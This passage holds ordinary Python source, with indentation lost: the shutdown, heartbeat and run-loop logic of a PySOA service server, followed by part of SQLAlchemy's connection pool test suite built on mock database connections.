# We tried shutting down gracefully, but it didn't work. This probably means that we are CPU bound
# in lower-level C code that can't be easily interrupted. Because of this, we forcefully terminate
# the server with prejudice. But first, we do our best to let things finish cleanly, if possible.
# noinspection PyProtectedMember
try:
exit_func = getattr(atexit, '_run_exitfuncs', None)
if exit_func:
thread = threading.Thread(target=exit_func)
thread.start()
thread.join(5.0) # don't let cleanup tasks take more than five seconds
else:
# we have no way to run exit functions, so at least give I/O two seconds to flush
time.sleep(2.0)
finally:
# noinspection PyProtectedMember
os._exit(1)
else:
self.logger.warning(
'No activity for {} seconds, triggering harakiri with grace period of {} seconds'.format(
self.settings['harakiri']['timeout'],
self.settings['harakiri']['shutdown_grace'],
),
extra=extra,
)
self.logger.info(details)
# We re-set the alarm so that if the graceful shutdown we're attempting here doesn't work, harakiri
# will be triggered again to force a non-graceful shutdown.
signal.alarm(self.settings['harakiri']['shutdown_grace'])
# Just setting the shutting_down flag isn't enough, because, if harakiri was triggered, we're probably
# CPU or I/O bound in some way that won't return any time soon. So we also raise HarakiriInterrupt to
# interrupt the main thread and cause the service to shut down in an orderly fashion.
self.shutting_down = True
raise HarakiriInterrupt()
finally:
self._shutdown_lock.release()
def setup(self): # type: () -> None
"""
Runs just before the server starts, if you need to do one-time loads or cache warming. Call super().setup() if
you override. See the documentation for `Server.main` for full details on the chain of `Server` method calls.
"""
def teardown(self): # type: () -> None
"""
Runs just before the server shuts down, if you need to do any kind of clean up (like updating a metrics gauge,
etc.). Call super().teardown() if you override. See the documentation for `Server.main` for full details on the
chain of `Server` method calls.
"""
def _close_old_django_connections(self): # type: () -> None
if self.use_django and not self._skip_django_database_cleanup:
django_close_old_database_connections()
def _close_django_caches(self, shutdown=False): # type: (bool) -> None
if self.use_django and django_caches:
if shutdown:
self.logger.info('Closing all Django caches')
for cache in django_caches.all():
cache.close(for_shutdown=shutdown)
def _create_heartbeat_file(self): # type: () -> None
if self.settings['heartbeat_file']:
heartbeat_file_path = self.settings['heartbeat_file'].replace('{{pid}}', six.text_type(os.getpid()))
if '{{fid}}' in heartbeat_file_path and self._forked_process_id is not None:
heartbeat_file_path = heartbeat_file_path.replace('{{fid}}', six.text_type(self._forked_process_id))
self.logger.info('Creating heartbeat file {}'.format(heartbeat_file_path))
file_path = os.path.abspath(heartbeat_file_path)
self._heartbeat_file_path = file_path
self._heartbeat_file = codecs.open(
filename=file_path,
mode='wb',
encoding='utf-8',
)
self._update_heartbeat_file()
def _delete_heartbeat_file(self): # type: () -> None
if self._heartbeat_file:
self.logger.info('Closing and removing heartbeat file')
# noinspection PyBroadException
try:
self._heartbeat_file.close()
except Exception:
self.logger.warning('Error while closing heartbeat file', exc_info=True)
finally:
# noinspection PyBroadException
try:
if self._heartbeat_file_path:
os.remove(self._heartbeat_file_path)
except Exception:
self.logger.warning('Error while removing heartbeat file', exc_info=True)
def _update_heartbeat_file(self): # type: () -> None
if self._heartbeat_file and time.time() - self._heartbeat_file_last_update > 2.5:
# Only update the heartbeat file if one is configured and it has been at least 2.5 seconds since the last
# update. This prevents us from dragging down service performance by constantly updating the file system.
self._heartbeat_file.seek(0)
self._heartbeat_file.write(six.text_type(time.time()))
self._heartbeat_file.flush()
self._heartbeat_file_last_update = time.time()
def perform_pre_request_actions(self): # type: () -> None
"""
Runs just before the server accepts a new request. Call super().perform_pre_request_actions() if you override.
Be sure your purpose for overriding isn't better met with middleware. See the documentation for `Server.main`
for full details on the chain of `Server` method calls.
"""
self.metrics.publish_all()
if self.use_django:
django_reset_database_queries()
self._close_old_django_connections()
def perform_post_request_actions(self): # type: () -> None
"""
Runs just after the server processes a request. Call super().perform_post_request_actions() if you override. Be
sure your purpose for overriding isn't better met with middleware. See the documentation for `Server.main` for
full details on the chain of `Server` method calls.
"""
self._close_old_django_connections()
self._close_django_caches()
self._update_heartbeat_file()
def perform_idle_actions(self): # type: () -> None
"""
Runs periodically when the server is idle, if it has been too long since it last received a request. Call
super().perform_idle_actions() if you override. See the documentation for `Server.main` for full details on the
chain of `Server` method calls.
"""
self._close_old_django_connections()
self._update_heartbeat_file()
def _set_busy_metrics(self, busy, running=True): # type: (bool, bool) -> None
self.metrics.gauge('server.worker.running').set(1 if running else 0)
self.metrics.gauge('server.worker.busy').set(1 if busy else 0)
def run(self): # type: () -> None
"""
Starts the server run loop and returns after the server shuts down due to a shutdown-request, Harakiri signal,
or unhandled exception. See the documentation for `Server.main` for full details on the chain of `Server`
method calls.
"""
self.logger.info(
'Service "{service}" server starting up, pysoa version {pysoa}, listening on transport {transport}.'.format(
service=self.service_name,
pysoa=pysoa.version.__version__,
transport=self.transport,
)
)
self.setup()
self.metrics.counter('server.worker.startup').increment()
self._set_busy_metrics(False)
self.metrics.publish_all()
if self._async_event_loop_thread:
self._async_event_loop_thread.start()
self._create_heartbeat_file()
signal.signal(signal.SIGINT, self.handle_shutdown_signal)
signal.signal(signal.SIGTERM, self.handle_shutdown_signal)
signal.signal(signal.SIGALRM, self.harakiri)
transient_failures = 0
# noinspection PyBroadException
try:
while not self.shutting_down:
# reset harakiri timeout
signal.alarm(self.settings['harakiri']['timeout'])
# Get, process, and execute the next JobRequest
try:
self.handle_next_request()
if transient_failures > 0:
transient_failures -= 1
except TransientPySOATransportError:
if transient_failures > 5:
self.logger.exception('Too many errors receiving message from transport; shutting down!')
break
# This sleeps using an exponential back-off period in the hopes that the problem will recover
sleep = (2 ** transient_failures + random.random()) / 4.0
self.logger.info(
'Transient error receiving message from transport, sleeping {} seconds and continuing.'.format(
sleep,
),
)
time.sleep(sleep)
transient_failures += 1
finally:
self.metrics.publish_all()
except HarakiriInterrupt:
self.metrics.counter('server.error.harakiri', harakiri_level='server')
self.logger.error('Harakiri interrupt occurred outside of action or job handling')
except Exception:
self.metrics.counter('server.error.unknown').increment()
self.logger.exception('Unhandled server error; shutting down')
finally:
self.teardown()
self.metrics.counter('server.worker.shutdown').increment()
self._set_busy_metrics(False, False)
self.metrics.publish_all()
self.logger.info('Server shutting down')
if self._async_event_loop_thread:
self._async_event_loop_thread.join()
self._close_django_caches(shutdown=True)
self._delete_heartbeat_file()
self.logger.info('Server shutdown complete')
@classmethod
def pre_fork(cls): # type: () -> None
"""
Called only if the --fork argument is used to pre-fork multiple worker processes. In this case, it is called
by the parent process immediately after signal handlers are set and immediately before the worker sub-processes
are spawned. It is never called again in the life span of the parent process, even if a worker process crashes
and gets re-spawned.
"""
# noinspection PyUnusedLocal
@classmethod
def initialize(cls, settings): # type: (ServerSettings) -> Type[Server]
"""
Called just before the `Server` class is instantiated, and passed the settings dict. Can be used to perform
settings manipulation, server class patching (such as for performance tracing operations), and more. Use with
great care and caution. Overriding methods must call `super` and return `cls` or a new/modified `cls`, which
will be used to instantiate the server. See the documentation for `Server.main` for full details on the chain
of `Server` method calls.
:return: The server class or a new/modified server class
"""
return cls
@classmethod
def main(cls, forked_process_id=None): # type: (Optional[int]) -> None
"""
Command-line entry point for running a PySOA server. The chain of method calls is as follows::
cls.main
|
-> cls.initialize => new_cls
-> new_cls.__init__ => self
-> self.run
|
-> self.setup
-> [async event loop started if Python 3.5+]
-> [heartbeat file created if configured]
-> loop: self.handle_next_request while not self.shutting_down
|
-> transport.receive_request_message
-> self.perform_idle_actions (if no request)
-> self.perform_pre_request_actions
-> self.process_job
|
-> middleware(self.execute_job)
-> transport.send_response_message
-> self.perform_post_request_actions
-> self.teardown
-> [async event loop joined in Python 3.5+; this make take a few seconds to finish running tasks]
-> [Django resources cleaned up]
-> [heartbeat file deleted if configured]
:param forked_process_id: If multiple processes are forked by the same parent process, this will be set to a
unique, deterministic (incremental) ID which can be used in logging, the heartbeat
file, etc. For example, if the `--fork` argument is used with the value 5 (creating
five child processes), this argument will have the values 1, 2, 3, 4, and 5 across
the five respective child processes.
"""
parser = argparse.ArgumentParser(
description='Server for the {} SOA service'.format(cls.service_name),
)
parser.add_argument(
'-d', '--daemon',
action='store_true',
help='run the server process as a daemon',
)
if not cls.use_django:
# If Django mode is turned on, we use the Django settings framework to get our settings, so the caller
# needs to set DJANGO_SETTINGS_MODULE. Otherwise, the caller must pass in the -s/--settings argument.
parser.add_argument(
'-s', '--settings',
help='The settings module to use',
required=True,
)
cmd_options, _ = parser.parse_known_args(sys.argv[1:])
# Load settings from the given file (or use Django and grab from its settings)
if cls.use_django:
# noinspection PyUnresolvedReferences
if not django_settings:
raise ImportError(
'Could not import Django. You must install Django if you enable Django support in your service.'
)
try:
settings = cls.settings_class(django_settings.SOA_SERVER_SETTINGS)
except AttributeError:
raise ValueError('Cannot find `SOA_SERVER_SETTINGS` in the Django settings.')
else:
try:
settings_module = importlib.import_module(cmd_options.settings)
except ImportError as e:
raise ValueError('Cannot import settings module `%s`: %s' % (cmd_options.settings, e))
try:
settings_dict = getattr(settings_module, 'SOA_SERVER_SETTINGS')
except AttributeError:
try:
settings_dict = getattr(settings_module, 'settings')
except AttributeError:
raise ValueError(
"Cannot find `SOA_SERVER_SETTINGS` or `settings` variable in settings module `{}`.".format(
cmd_options.settings,
)
)
settings = cls.settings_class(settings_dict)
if not cls.service_name:
raise AttributeError('Server subclass must set service_name')
PySOALogContextFilter.set_service_name(cls.service_name)
# Set up logging
logging.config.dictConfig(settings['logging'])
# Optionally daemonize
if cmd_options.daemon:
pid = os.fork()
if pid > 0:
print('PID={}'.format(pid))
sys.exit()
# Set up server and signal handling
server = cls.initialize(settings)(settings, forked_process_id) # type: Server
# Start server event loop
server.run()
|
test_pool.py
|
import threading
import time
from sqlalchemy import pool, select, event
import sqlalchemy as tsa
from sqlalchemy import testing
from sqlalchemy.testing.util import gc_collect, lazy_gc
from sqlalchemy.testing import eq_, assert_raises
from sqlalchemy.testing.engines import testing_engine
from sqlalchemy.testing import fixtures
mcid = 1
class MockDBAPI(object):
throw_error = False
def connect(self, *args, **kwargs):
if self.throw_error:
raise Exception("couldnt connect !")
delay = kwargs.pop('delay', 0)
if delay:
time.sleep(delay)
return MockConnection()
class MockConnection(object):
closed = False
def __init__(self):
global mcid
self.id = mcid
mcid += 1
def close(self):
self.closed = True
def rollback(self):
pass
def cursor(self):
return MockCursor()
class MockCursor(object):
def execute(self, *args, **kw):
pass
def close(self):
pass
class PoolTestBase(fixtures.TestBase):
def setup(self):
pool.clear_managers()
@classmethod
def teardown_class(cls):
pool.clear_managers()
def _queuepool_fixture(self, **kw):
dbapi, pool = self._queuepool_dbapi_fixture(**kw)
return pool
def _queuepool_dbapi_fixture(self, **kw):
dbapi = MockDBAPI()
return dbapi, pool.QueuePool(creator=lambda: dbapi.connect('foo.db'),
**kw)
class PoolTest(PoolTestBase):
def test_manager(self):
manager = pool.manage(MockDBAPI(), use_threadlocal=True)
c1 = manager.connect('foo.db')
c2 = manager.connect('foo.db')
c3 = manager.connect('bar.db')
c4 = manager.connect("foo.db", bar="bat")
c5 = manager.connect("foo.db", bar="hoho")
c6 = manager.connect("foo.db", bar="bat")
assert c1.cursor() is not None
assert c1 is c2
assert c1 is not c3
assert c4 is c6
assert c4 is not c5
def test_manager_with_key(self):
class NoKws(object):
def connect(self, arg):
return MockConnection()
manager = pool.manage(NoKws(), use_threadlocal=True)
c1 = manager.connect('foo.db', sa_pool_key="a")
c2 = manager.connect('foo.db', sa_pool_key="b")
c3 = manager.connect('bar.db', sa_pool_key="a")
assert c1.cursor() is not None
assert c1 is not c2
assert c1 is c3
def test_bad_args(self):
manager = pool.manage(MockDBAPI())
manager.connect(None)
def test_non_thread_local_manager(self):
manager = pool.manage(MockDBAPI(), use_threadlocal=False)
connection = manager.connect('foo.db')
connection2 = manager.connect('foo.db')
self.assert_(connection.cursor() is not None)
self.assert_(connection is not connection2)
@testing.fails_on('+pyodbc',
"pyodbc cursor doesn't implement tuple __eq__")
def test_cursor_iterable(self):
conn = testing.db.raw_connection()
cursor = conn.cursor()
cursor.execute(str(select([1], bind=testing.db)))
expected = [(1, )]
for row in cursor:
eq_(row, expected.pop(0))
def test_no_connect_on_recreate(self):
def creator():
raise Exception("no creates allowed")
for cls in (pool.SingletonThreadPool, pool.StaticPool,
pool.QueuePool, pool.NullPool, pool.AssertionPool):
p = cls(creator=creator)
p.dispose()
p2 = p.recreate()
assert p2.__class__ is cls
mock_dbapi = MockDBAPI()
p = cls(creator=mock_dbapi.connect)
conn = p.connect()
conn.close()
mock_dbapi.throw_error = True
p.dispose()
p.recreate()
def testthreadlocal_del(self):
self._do_testthreadlocal(useclose=False)
def testthreadlocal_close(self):
self._do_testthreadlocal(useclose=True)
def _do_testthreadlocal(self, useclose=False):
dbapi = MockDBAPI()
for p in pool.QueuePool(creator=dbapi.connect,
pool_size=3, max_overflow=-1,
use_threadlocal=True), \
pool.SingletonThreadPool(creator=dbapi.connect,
use_threadlocal=True):
c1 = p.connect()
c2 = p.connect()
self.assert_(c1 is c2)
c3 = p.unique_connection()
self.assert_(c3 is not c1)
if useclose:
c2.close()
else:
c2 = None
c2 = p.connect()
self.assert_(c1 is c2)
self.assert_(c3 is not c1)
if useclose:
c2.close()
else:
c2 = None
lazy_gc()
if useclose:
c1 = p.connect()
c2 = p.connect()
c3 = p.connect()
c3.close()
c2.close()
self.assert_(c1.connection is not None)
c1.close()
c1 = c2 = c3 = None
# extra tests with QueuePool to ensure connections get
# __del__()ed when dereferenced
if isinstance(p, pool.QueuePool):
lazy_gc()
self.assert_(p.checkedout() == 0)
c1 = p.connect()
c2 = p.connect()
if useclose:
c2.close()
c1.close()
else:
c2 = None
c1 = None
lazy_gc()
self.assert_(p.checkedout() == 0)
def test_info(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c = p.connect()
self.assert_(not c.info)
self.assert_(c.info is c._connection_record.info)
c.info['foo'] = 'bar'
c.close()
del c
c = p.connect()
self.assert_('foo' in c.info)
c.invalidate()
c = p.connect()
self.assert_('foo' not in c.info)
c.info['foo2'] = 'bar2'
c.detach()
self.assert_('foo2' in c.info)
c2 = p.connect()
self.assert_(c.connection is not c2.connection)
self.assert_(not c2.info)
self.assert_('foo2' in c.info)
class PoolDialectTest(PoolTestBase):
def _dialect(self):
canary = []
class PoolDialect(object):
def do_rollback(self, dbapi_connection):
canary.append('R')
dbapi_connection.rollback()
def do_commit(self, dbapi_connection):
canary.append('C')
dbapi_connection.commit()
def do_close(self, dbapi_connection):
canary.append('CL')
dbapi_connection.close()
return PoolDialect(), canary
def _do_test(self, pool_cls, assertion):
mock_dbapi = MockDBAPI()
dialect, canary = self._dialect()
p = pool_cls(creator=mock_dbapi.connect)
p._dialect = dialect
conn = p.connect()
conn.close()
p.dispose()
p.recreate()
conn = p.connect()
conn.close()
eq_(canary, assertion)
def test_queue_pool(self):
self._do_test(pool.QueuePool, ['R', 'CL', 'R'])
def test_assertion_pool(self):
self._do_test(pool.AssertionPool, ['R', 'CL', 'R'])
def test_singleton_pool(self):
self._do_test(pool.SingletonThreadPool, ['R', 'CL', 'R'])
def test_null_pool(self):
self._do_test(pool.NullPool, ['R', 'CL', 'R', 'CL'])
def test_static_pool(self):
self._do_test(pool.StaticPool, ['R', 'R'])
class PoolEventsTest(PoolTestBase):
def _first_connect_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def first_connect(*arg, **kw):
canary.append('first_connect')
event.listen(p, 'first_connect', first_connect)
return p, canary
def _connect_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def connect(*arg, **kw):
canary.append('connect')
event.listen(p, 'connect', connect)
return p, canary
def _checkout_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def checkout(*arg, **kw):
canary.append('checkout')
event.listen(p, 'checkout', checkout)
return p, canary
def _checkin_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def checkin(*arg, **kw):
canary.append('checkin')
event.listen(p, 'checkin', checkin)
return p, canary
def _reset_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def reset(*arg, **kw):
canary.append('reset')
event.listen(p, 'reset', reset)
return p, canary
def test_first_connect_event(self):
p, canary = self._first_connect_event_fixture()
c1 = p.connect()
eq_(canary, ['first_connect'])
def test_first_connect_event_fires_once(self):
p, canary = self._first_connect_event_fixture()
c1 = p.connect()
c2 = p.connect()
eq_(canary, ['first_connect'])
def test_first_connect_on_previously_recreated(self):
p, canary = self._first_connect_event_fixture()
p2 = p.recreate()
c1 = p.connect()
c2 = p2.connect()
eq_(canary, ['first_connect', 'first_connect'])
def test_first_connect_on_subsequently_recreated(self):
p, canary = self._first_connect_event_fixture()
c1 = p.connect()
p2 = p.recreate()
c2 = p2.connect()
eq_(canary, ['first_connect', 'first_connect'])
def test_connect_event(self):
p, canary = self._connect_event_fixture()
c1 = p.connect()
eq_(canary, ['connect'])
def test_connect_event_fires_subsequent(self):
p, canary = self._connect_event_fixture()
c1 = p.connect()
c2 = p.connect()
eq_(canary, ['connect', 'connect'])
def test_connect_on_previously_recreated(self):
p, canary = self._connect_event_fixture()
p2 = p.recreate()
c1 = p.connect()
c2 = p2.connect()
eq_(canary, ['connect', 'connect'])
def test_connect_on_subsequently_recreated(self):
p, canary = self._connect_event_fixture()
c1 = p.connect()
p2 = p.recreate()
c2 = p2.connect()
eq_(canary, ['connect', 'connect'])
def test_checkout_event(self):
p, canary = self._checkout_event_fixture()
c1 = p.connect()
eq_(canary, ['checkout'])
def test_checkout_event_fires_subsequent(self):
p, canary = self._checkout_event_fixture()
c1 = p.connect()
c2 = p.connect()
eq_(canary, ['checkout', 'checkout'])
def test_checkout_event_on_subsequently_recreated(self):
p, canary = self._checkout_event_fixture()
c1 = p.connect()
p2 = p.recreate()
c2 = p2.connect()
eq_(canary, ['checkout', 'checkout'])
def test_checkin_event(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
eq_(canary, [])
c1.close()
eq_(canary, ['checkin'])
def test_reset_event(self):
p, canary = self._reset_event_fixture()
c1 = p.connect()
eq_(canary, [])
c1.close()
eq_(canary, ['reset'])
def test_checkin_event_gc(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
eq_(canary, [])
del c1
lazy_gc()
eq_(canary, ['checkin'])
def test_checkin_event_on_subsequently_recreated(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
p2 = p.recreate()
c2 = p2.connect()
eq_(canary, [])
c1.close()
eq_(canary, ['checkin'])
c2.close()
eq_(canary, ['checkin', 'checkin'])
def test_listen_targets_scope(self):
canary = []
def listen_one(*args):
canary.append("listen_one")
def listen_two(*args):
canary.append("listen_two")
def listen_three(*args):
canary.append("listen_three")
def listen_four(*args):
canary.append("listen_four")
engine = testing_engine(testing.db.url)
event.listen(pool.Pool, 'connect', listen_one)
event.listen(engine.pool, 'connect', listen_two)
event.listen(engine, 'connect', listen_three)
event.listen(engine.__class__, 'connect', listen_four)
engine.execute(select([1])).close()
eq_(
canary,
["listen_one", "listen_four", "listen_two", "listen_three"]
)
def test_listen_targets_per_subclass(self):
"""test that listen() called on a subclass remains specific to that subclass."""
canary = []
def listen_one(*args):
canary.append("listen_one")
def listen_two(*args):
canary.append("listen_two")
def listen_three(*args):
canary.append("listen_three")
event.listen(pool.Pool, 'connect', listen_one)
event.listen(pool.QueuePool, 'connect', listen_two)
event.listen(pool.SingletonThreadPool, 'connect', listen_three)
p1 = pool.QueuePool(creator=MockDBAPI().connect)
p2 = pool.SingletonThreadPool(creator=MockDBAPI().connect)
assert listen_one in p1.dispatch.connect
assert listen_two in p1.dispatch.connect
assert listen_three not in p1.dispatch.connect
assert listen_one in p2.dispatch.connect
assert listen_two not in p2.dispatch.connect
assert listen_three in p2.dispatch.connect
p1.connect()
eq_(canary, ["listen_one", "listen_two"])
p2.connect()
eq_(canary, ["listen_one", "listen_two", "listen_one", "listen_three"])
def teardown(self):
# TODO: need to get remove() functionality
# going
pool.Pool.dispatch._clear()
class DeprecatedPoolListenerTest(PoolTestBase):
@testing.requires.predictable_gc
@testing.uses_deprecated(r".*Use event.listen")
def test_listeners(self):
class InstrumentingListener(object):
def __init__(self):
if hasattr(self, 'connect'):
self.connect = self.inst_connect
if hasattr(self, 'first_connect'):
self.first_connect = self.inst_first_connect
if hasattr(self, 'checkout'):
self.checkout = self.inst_checkout
if hasattr(self, 'checkin'):
self.checkin = self.inst_checkin
self.clear()
def clear(self):
self.connected = []
self.first_connected = []
self.checked_out = []
self.checked_in = []
def assert_total(innerself, conn, fconn, cout, cin):
eq_(len(innerself.connected), conn)
eq_(len(innerself.first_connected), fconn)
eq_(len(innerself.checked_out), cout)
eq_(len(innerself.checked_in), cin)
def assert_in(innerself, item, in_conn, in_fconn,
in_cout, in_cin):
self.assert_((item in innerself.connected) == in_conn)
self.assert_((item in innerself.first_connected) == in_fconn)
self.assert_((item in innerself.checked_out) == in_cout)
self.assert_((item in innerself.checked_in) == in_cin)
def inst_connect(self, con, record):
print("connect(%s, %s)" % (con, record))
assert con is not None
assert record is not None
self.connected.append(con)
def inst_first_connect(self, con, record):
print("first_connect(%s, %s)" % (con, record))
assert con is not None
assert record is not None
self.first_connected.append(con)
def inst_checkout(self, con, record, proxy):
print("checkout(%s, %s, %s)" % (con, record, proxy))
assert con is not None
assert record is not None
assert proxy is not None
self.checked_out.append(con)
def inst_checkin(self, con, record):
print("checkin(%s, %s)" % (con, record))
# con can be None if invalidated
assert record is not None
self.checked_in.append(con)
class ListenAll(tsa.interfaces.PoolListener, InstrumentingListener):
pass
class ListenConnect(InstrumentingListener):
def connect(self, con, record):
pass
class ListenFirstConnect(InstrumentingListener):
def first_connect(self, con, record):
pass
class ListenCheckOut(InstrumentingListener):
def checkout(self, con, record, proxy, num):
pass
class ListenCheckIn(InstrumentingListener):
def checkin(self, con, record):
pass
def assert_listeners(p, total, conn, fconn, cout, cin):
for instance in (p, p.recreate()):
self.assert_(len(instance.dispatch.connect) == conn)
self.assert_(len(instance.dispatch.first_connect) == fconn)
self.assert_(len(instance.dispatch.checkout) == cout)
self.assert_(len(instance.dispatch.checkin) == cin)
p = self._queuepool_fixture()
assert_listeners(p, 0, 0, 0, 0, 0)
p.add_listener(ListenAll())
assert_listeners(p, 1, 1, 1, 1, 1)
p.add_listener(ListenConnect())
assert_listeners(p, 2, 2, 1, 1, 1)
p.add_listener(ListenFirstConnect())
assert_listeners(p, 3, 2, 2, 1, 1)
p.add_listener(ListenCheckOut())
assert_listeners(p, 4, 2, 2, 2, 1)
p.add_listener(ListenCheckIn())
assert_listeners(p, 5, 2, 2, 2, 2)
del p
snoop = ListenAll()
p = self._queuepool_fixture(listeners=[snoop])
assert_listeners(p, 1, 1, 1, 1, 1)
c = p.connect()
snoop.assert_total(1, 1, 1, 0)
cc = c.connection
snoop.assert_in(cc, True, True, True, False)
c.close()
snoop.assert_in(cc, True, True, True, True)
del c, cc
snoop.clear()
# this one depends on immediate gc
c = p.connect()
cc = c.connection
snoop.assert_in(cc, False, False, True, False)
snoop.assert_total(0, 0, 1, 0)
del c, cc
lazy_gc()
snoop.assert_total(0, 0, 1, 1)
p.dispose()
snoop.clear()
c = p.connect()
c.close()
c = p.connect()
snoop.assert_total(1, 0, 2, 1)
c.close()
snoop.assert_total(1, 0, 2, 2)
# invalidation
p.dispose()
snoop.clear()
c = p.connect()
snoop.assert_total(1, 0, 1, 0)
c.invalidate()
snoop.assert_total(1, 0, 1, 1)
c.close()
snoop.assert_total(1, 0, 1, 1)
del c
lazy_gc()
snoop.assert_total(1, 0, 1, 1)
c = p.connect()
snoop.assert_total(2, 0, 2, 1)
c.close()
del c
lazy_gc()
snoop.assert_total(2, 0, 2, 2)
# detached
p.dispose()
snoop.clear()
c = p.connect()
snoop.assert_total(1, 0, 1, 0)
c.detach()
snoop.assert_total(1, 0, 1, 0)
c.close()
del c
snoop.assert_total(1, 0, 1, 0)
c = p.connect()
snoop.assert_total(2, 0, 2, 0)
c.close()
del c
snoop.assert_total(2, 0, 2, 1)
# recreated
p = p.recreate()
snoop.clear()
c = p.connect()
snoop.assert_total(1, 1, 1, 0)
c.close()
snoop.assert_total(1, 1, 1, 1)
c = p.connect()
snoop.assert_total(1, 1, 2, 1)
c.close()
snoop.assert_total(1, 1, 2, 2)
@testing.uses_deprecated(r".*Use event.listen")
def test_listeners_callables(self):
def connect(dbapi_con, con_record):
counts[0] += 1
def checkout(dbapi_con, con_record, con_proxy):
counts[1] += 1
def checkin(dbapi_con, con_record):
counts[2] += 1
i_all = dict(connect=connect, checkout=checkout, checkin=checkin)
i_connect = dict(connect=connect)
i_checkout = dict(checkout=checkout)
i_checkin = dict(checkin=checkin)
for cls in (pool.QueuePool, pool.StaticPool):
counts = [0, 0, 0]
def assert_listeners(p, total, conn, cout, cin):
for instance in (p, p.recreate()):
eq_(len(instance.dispatch.connect), conn)
eq_(len(instance.dispatch.checkout), cout)
eq_(len(instance.dispatch.checkin), cin)
p = self._queuepool_fixture()
assert_listeners(p, 0, 0, 0, 0)
p.add_listener(i_all)
assert_listeners(p, 1, 1, 1, 1)
p.add_listener(i_connect)
assert_listeners(p, 2, 1, 1, 1)
p.add_listener(i_checkout)
assert_listeners(p, 3, 1, 1, 1)
p.add_listener(i_checkin)
assert_listeners(p, 4, 1, 1, 1)
del p
p = self._queuepool_fixture(listeners=[i_all])
assert_listeners(p, 1, 1, 1, 1)
c = p.connect()
assert counts == [1, 1, 0]
c.close()
assert counts == [1, 1, 1]
c = p.connect()
assert counts == [1, 2, 1]
p.add_listener(i_checkin)
c.close()
assert counts == [1, 2, 2]
class QueuePoolTest(PoolTestBase):
def testqueuepool_del(self):
self._do_testqueuepool(useclose=False)
def testqueuepool_close(self):
self._do_testqueuepool(useclose=True)
def _do_testqueuepool(self, useclose=False):
p = self._queuepool_fixture(pool_size=3,
max_overflow=-1)
def status(pool):
tup = pool.size(), pool.checkedin(), pool.overflow(), \
pool.checkedout()
print('Pool size: %d Connections in pool: %d Current '\
'Overflow: %d Current Checked out connections: %d' % tup)
return tup
c1 = p.connect()
self.assert_(status(p) == (3, 0, -2, 1))
c2 = p.connect()
self.assert_(status(p) == (3, 0, -1, 2))
c3 = p.connect()
self.assert_(status(p) == (3, 0, 0, 3))
c4 = p.connect()
self.assert_(status(p) == (3, 0, 1, 4))
c5 = p.connect()
self.assert_(status(p) == (3, 0, 2, 5))
c6 = p.connect()
self.assert_(status(p) == (3, 0, 3, 6))
if useclose:
c4.close()
c3.close()
c2.close()
else:
c4 = c3 = c2 = None
lazy_gc()
self.assert_(status(p) == (3, 3, 3, 3))
if useclose:
c1.close()
c5.close()
c6.close()
else:
c1 = c5 = c6 = None
lazy_gc()
self.assert_(status(p) == (3, 3, 0, 0))
c1 = p.connect()
c2 = p.connect()
self.assert_(status(p) == (3, 1, 0, 2), status(p))
if useclose:
c2.close()
else:
c2 = None
lazy_gc()
self.assert_(status(p) == (3, 2, 0, 1))
c1.close()
lazy_gc()
assert not pool._refs
def test_timeout(self):
p = self._queuepool_fixture(pool_size=3,
max_overflow=0,
timeout=2)
c1 = p.connect()
c2 = p.connect()
c3 = p.connect()
now = time.time()
try:
c4 = p.connect()
assert False
except tsa.exc.TimeoutError:
assert int(time.time() - now) == 2
def test_timeout_race(self):
# test a race condition where the initial connecting threads all race
# to queue.Empty, then block on the mutex. each thread consumes a
# connection as they go in. when the limit is reached, the remaining
# threads go in, and get TimeoutError; even though they never got to
# wait for the timeout on queue.get(). the fix involves checking the
# timeout again within the mutex, and if so, unlocking and throwing
# them back to the start of do_get()
dbapi = MockDBAPI()
p = pool.QueuePool(
creator=lambda: dbapi.connect(delay=.05),
pool_size=2,
max_overflow=1, use_threadlocal=False, timeout=3)
timeouts = []
def checkout():
for x in range(1):
now = time.time()
try:
c1 = p.connect()
except tsa.exc.TimeoutError:
timeouts.append(time.time() - now)
continue
time.sleep(4)
c1.close()
threads = []
for i in range(10):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join()
assert len(timeouts) > 0
for t in timeouts:
assert t >= 3, "Not all timeouts were >= 3 seconds %r" % timeouts
# normally, the timeout should under 4 seconds,
# but on a loaded down buildbot it can go up.
assert t < 14, "Not all timeouts were < 14 seconds %r" % timeouts
def _test_overflow(self, thread_count, max_overflow):
gc_collect()
dbapi = MockDBAPI()
def creator():
time.sleep(.05)
return dbapi.connect()
p = pool.QueuePool(creator=creator,
pool_size=3, timeout=2,
max_overflow=max_overflow)
peaks = []
def whammy():
for i in range(10):
try:
con = p.connect()
time.sleep(.005)
peaks.append(p.overflow())
con.close()
del con
except tsa.exc.TimeoutError:
pass
threads = []
for i in range(thread_count):
th = threading.Thread(target=whammy)
th.start()
threads.append(th)
for th in threads:
th.join()
self.assert_(max(peaks) <= max_overflow)
lazy_gc()
assert not pool._refs
def test_waiters_handled(self):
"""test that threads waiting for connections are
handled when the pool is replaced.
"""
dbapi = MockDBAPI()
def creator():
return dbapi.connect()
success = []
for timeout in (None, 30):
for max_overflow in (0, -1, 3):
p = pool.QueuePool(creator=creator,
pool_size=2, timeout=timeout,
max_overflow=max_overflow)
def waiter(p):
conn = p.connect()
time.sleep(.5)
success.append(True)
conn.close()
time.sleep(.2)
c1 = p.connect()
c2 = p.connect()
for i in range(2):
t = threading.Thread(target=waiter, args=(p, ))
t.setDaemon(True) # so the tests dont hang if this fails
t.start()
c1.invalidate()
c2.invalidate()
p2 = p._replace()
time.sleep(2)
eq_(len(success), 12)
@testing.requires.python26
def test_notify_waiters(self):
dbapi = MockDBAPI()
canary = []
def creator1():
canary.append(1)
return dbapi.connect()
def creator2():
canary.append(2)
return dbapi.connect()
p1 = pool.QueuePool(creator=creator1,
pool_size=1, timeout=None,
max_overflow=0)
p2 = pool.QueuePool(creator=creator2,
pool_size=1, timeout=None,
max_overflow=-1)
def waiter(p):
conn = p.connect()
time.sleep(.5)
conn.close()
c1 = p1.connect()
for i in range(5):
t = threading.Thread(target=waiter, args=(p1, ))
t.setDaemon(True)
